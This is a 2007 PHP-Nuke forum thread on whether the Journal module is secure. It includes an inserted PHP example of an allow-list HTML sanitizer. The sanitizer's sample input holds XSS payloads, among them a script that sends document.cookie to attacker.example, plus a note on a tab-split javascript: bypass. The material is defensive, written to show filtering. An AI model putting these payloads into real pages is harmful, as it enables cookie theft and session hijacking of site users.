Ravens PHP Scripts: Forums
Forum: Raven's RavenNuke(tm) v2.00.00 - v2.02.00 Distro

valdarez (Worker; Joined: Jan 22, 2007; Posts: 104)
Posted: Tue Feb 13, 2007 5:28 pm

When I first installed Nuke on version 7.5 I read several posts that indicated I should disable the Journal due to security vulnerabilities. Is that still the case for version 7.6, or more importantly, for the RavenNuke 2.02.02 distro? I would like to add some type of 'blog' feature for the website and the Journal seems the natural choice. (I'm open to other alternatives whether free or commercial)

Edit: Junk, wrong forum. Can someone move this to the 2.02.02 forum please?
fkelly (Former Moderator in Good Standing; Joined: Aug 30, 2005; Posts: 3312; Location: near Albany NY)
Posted: Tue Feb 13, 2007 7:08 pm

I don't know what the security vulnerabilities are with Journal and I've never used it so I can't address the first part of your question. I do know that I'd probably wait just a bit for 2.10 before implementing new features.

On the blog, what I did on the site I'm webmaster for was to create a new news story category called "blog". Then if a user wants a blog he can just submit news and you can classify the article under blog. As long as the story is not associated with the "article" category you have the option to not show it on the home page. So, if a user writes a series of "blog" entries you can just put the most recent one on the home page and have the rest in the stories archive. Then if you click on blog you'll see all the articles in that category. Occurs to me as I'm typing that you could also create categories like blog_user1, blog_user2 if you wanted to keep them separate.

This may not be what you want, I just throw it out as an idea.
montego (Site Admin; Joined: Aug 29, 2004; Posts: 9449; Location: Arizona)
Posted: Tue Feb 13, 2007 11:23 pm

valdarez, unfortunately I am not sure. My "gut" tells me "yes" because the upcoming 2.10.00 release has ALL the latest patches and kguske did some work, I think, to straighten out the editor, but I am not sure any of us could say anything is 100%... we are ALL humor and "to err is human".

valdarez
Posted: Tue Feb 13, 2007 11:59 pm

montego wrote:
valdarez, unfortunately I am not sure. My "gut" tells me "yes" because the upcoming 2.10.00 release has ALL the latest patches and kguske did some work, I think, to straighten out the editor, but I am not sure any of us could say anything is 100%... we are ALL humor and "to err is human".
Was the "humor" typo a Freudian slip to prove your error point? :)
 
montego
Posted: Wed Feb 14, 2007 12:21 am

You will never know for sure... killing me
 
kguske (Site Admin; Joined: Jun 04, 2004; Posts: 6383)
Posted: Wed Feb 14, 2007 6:53 am

The changes we made were to address the use of a kses filter class that sixonetonoffun added to increase security. Since we were using kses for nukeWYSIWYG, we had to resolve the conflict. Even though I did not test it for security, I believe six did.

valdarez
Posted: Fri Feb 16, 2007 3:26 pm

It's my understanding that Raven is meant to be an extremely secure release of the PHPNuke code base. That would lead me to believe all built-in modules should be inherently secure if all of the patches are up to date. There don't seem to be any patches for the Journal. It just worries me that it supports HTML, and I have read several security posts/threads warning to disable all HTML in PHPNuke. It sounds like you guys are giving it a tentative "I think it's secure" endorsement?
 
Guardian2003 (Site Admin; Joined: Aug 28, 2003; Posts: 6792; Location: Ha Noi, Viet Nam)
Posted: Fri Feb 16, 2007 5:36 pm

On the other side of the coin, I have heard of no reports where a successful exploit was performed using the Journal module where the FCK WYSIWYG is integrated. But whatever you decide, unless you want tons of spam, ensure the module access is set for registered users at the minimum.
kguske
Posted: Fri Feb 16, 2007 10:14 pm

Your understanding is correct - at least the first part. RavenNuke has the latest security patches, NukeSentinel and more, which make it more secure than standard, unpatched Nuke distributions. With nukeWYSIWYG (specifically, the kses HTML filter class), it is much more secure than Nuke 7.7 and higher, where HTML checking was basically disabled.

The version of the Journal module included in RavenNuke, though hardly used and not as thoroughly tested as other modules, was enhanced by Sixonetonoffun to use the kses filter class (among other things), in addition to the other security enhancements included in RavenNuke (mainly NukeSentinel) that protect all modules.

Does that mean we certify this module to be secure and protected from any and all attacks and configuration, shall we say, mistakes? Of course not. Security is a journey - not a destination. People will come up with new ways to circumvent or break built in protections, and we must be vigilant in identifying and addressing those issues.

In short, if I were using an unpatched distribution without NukeSentinel and an HTML filter class / function like kses (there are other good options, too), I would disable all HTML. Then again, even that wouldn't fully protect the site. But with all the enhancements and testing done on RN, you should be significantly less likely to have a successful attack using the Journal module. Clear as mud? :)
 
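As an added illustration of the two routes kguske contrasts above ("disable all HTML" versus an HTML filter class like kses), here is a small PHP sketch. It is the editor's example, not kses, not nukeWYSIWYG and not RavenNuke code. It assumes PHP 7.4 or later with the bundled dom extension; the tag and attribute allow-lists, the scheme list and the sample journal entry are constructed for the demonstration and are not taken from the thread.

```php
<?php
// Editor's example, not kses or RavenNuke code. Two ways to handle HTML in a
// user-submitted journal entry: disable_html() renders it as literal text;
// filter_html() is an allow-list filter in the spirit of kses.
// Assumes PHP 7.4+ with the dom extension. Lists below are the editor's choice.

// Tags an entry may contain, with the attributes each may keep.
const ALLOWED_TAGS = [
    'p' => [], 'br' => [], 'b' => [], 'i' => [], 'em' => [], 'strong' => [],
    'ul' => [], 'ol' => [], 'li' => [], 'blockquote' => [],
    'a' => ['href', 'title'],
];
const ALLOWED_SCHEMES = ['http', 'https', 'mailto'];

// Option 1: no HTML at all. Every tag is shown as text, never interpreted.
function disable_html(string $input): string
{
    return htmlspecialchars($input, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// True if a URL is relative or uses an allow-listed scheme.
function safe_url(string $url): bool
{
    // Browsers ignore ASCII control characters and whitespace inside a URL,
    // so "java\tscript:" arrives as "javascript:". Strip them before looking.
    $clean = preg_replace('/[\x00-\x20\x7f]/', '', $url);
    // A ':' that appears before any '/', '?' or '#' terminates a scheme.
    if (preg_match('/^([^\/?#:]*):/', $clean, $m)) {
        return in_array(strtolower($m[1]), ALLOWED_SCHEMES, true);
    }
    return true;
}

// Walk a subtree: drop script/style with their contents, unwrap any other
// tag that is not allow-listed (keeping its text), strip unknown attributes,
// and drop comments and other non-text nodes.
function sanitize_node(DOMNode $parent): void
{
    $children = [];
    foreach ($parent->childNodes as $child) {   // copy: the node list is live
        $children[] = $child;
    }
    foreach ($children as $child) {
        if ($child instanceof DOMText) {
            continue;                             // text is escaped on output
        }
        if (!($child instanceof DOMElement)) {
            $parent->removeChild($child);         // comments, PIs, ...
            continue;
        }
        $tag = strtolower($child->tagName);
        if ($tag === 'script' || $tag === 'style') {
            $parent->removeChild($child);         // body is code, not text
            continue;
        }
        sanitize_node($child);                    // children first, so hoisted content is clean
        if (!isset(ALLOWED_TAGS[$tag])) {
            while ($child->firstChild !== null) { // hoist children in place of the tag
                $parent->insertBefore($child->firstChild, $child);
            }
            $parent->removeChild($child);
            continue;
        }
        $names = [];
        foreach ($child->attributes as $attr) {   // copy: removing while iterating skips entries
            $names[] = $attr->name;
        }
        foreach ($names as $name) {
            $lname = strtolower($name);
            $allowed = in_array($lname, ALLOWED_TAGS[$tag], true);
            if ($allowed && in_array($lname, ['href', 'src'], true)) {
                $allowed = safe_url($child->getAttribute($name));
            }
            if (!$allowed) {
                $child->removeAttribute($name);
            }
        }
    }
}

// Option 2: allow-listed HTML. Returns a re-serialized, cleaned fragment.
function filter_html(string $dirty): string
{
    $doc = new DOMDocument();
    $prev = libxml_use_internal_errors(true);     // tag soup is expected; no warnings
    // The XML PI pins the input encoding; the <div> wrapper stops libxml from
    // wrapping bare top-level text in <p>. <div> is not allow-listed, so
    // sanitize_node() unwraps it again.
    $doc->loadHTML('<?xml encoding="UTF-8" ?><div>' . $dirty . '</div>');
    libxml_clear_errors();
    libxml_use_internal_errors($prev);

    $body = $doc->getElementsByTagName('body')->item(0);
    if ($body === null) {
        return '';
    }
    sanitize_node($body);
    $out = '';
    foreach ($body->childNodes as $child) {
        $out .= $doc->saveHTML($child);
    }
    return $out;
}

// Constructed sample entry (not a real post) carrying the usual payloads.
$entry = '<p>Hello <b onmouseover="alert(1)">world</b></p>'
       . '<script>location="http://attacker.example/?c="+document.cookie</script>'
       . '<a href="javascript:alert(document.cookie)">click</a> '
       . '<a href="http://example.com/" title="ok">fine</a>'
       . '<img src="x" onerror="alert(1)"><!-- comment -->';

echo "disabled: ", disable_html($entry), "\n";
echo "filtered: ", filter_html($entry), "\n";
```

Run it from the command line with php. The "disabled" line shows the whole entry as escaped literal text, which is what "disable all HTML" buys you at the cost of any formatting. The "filtered" line keeps the paragraph, the bold text and the http link but loses the script element, the onmouseover and onerror handlers, the img tag, the comment and the javascript: href. The control-character stripping in safe_url() is the edge case worth noticing: a filter that only looks for the literal string "javascript:" misses "java<TAB>script:", which browsers accept as the same scheme.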
montego
Posted: Sat Feb 17, 2007 9:02 am

And, one additional comment, and NOT to take away from kguske's excellent response because this is just a general cautionary note! Just because you have NukeSentinel and the new kses, this does NOT protect you when you install poorly written add-on modules and hacks. This is why it is each admin's responsibility to know what they are installing and take personal responsibility for it. That is what OpenSource / free is all about... the responsibility lies with YOU.

Regards,
montego
 
valdarez
Posted: Sat Feb 17, 2007 11:45 am

montego wrote:
And, one additional comment, and NOT to take away from kguske's excellent response because this is just a general cautionary note! Just because you have NukeSentinel and the new kses, this does NOT protect you when you install poorly written add-on modules and hacks. This is why it is each admin's responsibility to know what they are installing and take personal responsibility for it. That is what OpenSource / free is all about... the responsibility lies with YOU.

Regards,
montego
Understood, montego. I only had other nodes installed when the site was first hacked, Shoutcast and the Donations node. I failed to keep the forums up to date. I think the first time it was hacked we were on the .07 patch, when .13 was available, and this last time we were hacked I was on the .13 patch when .22 was available. A really nice-to-have feature that could be added to a future version of phpnuke is the ability for phpnuke to check for new patches/versions of the various modules and send an email to the administrator.

In regards to the filter class / nukeWYSIWYG editor: is it disabled by default? I have the Journal running so the Administrator can view it, and it's just using the standard editor.
 
jakec (Site Admin; Joined: Feb 06, 2006; Posts: 3048; Location: United Kingdom)
Posted: Sun Feb 18, 2007 8:33 am

nukeWYSIWYG is not integrated with the Journal module in 2.02.02, but it will be in the new 2.10.0.

Powered by phpBB © 2001-2007 phpBB Group
All times are GMT - 6 Hours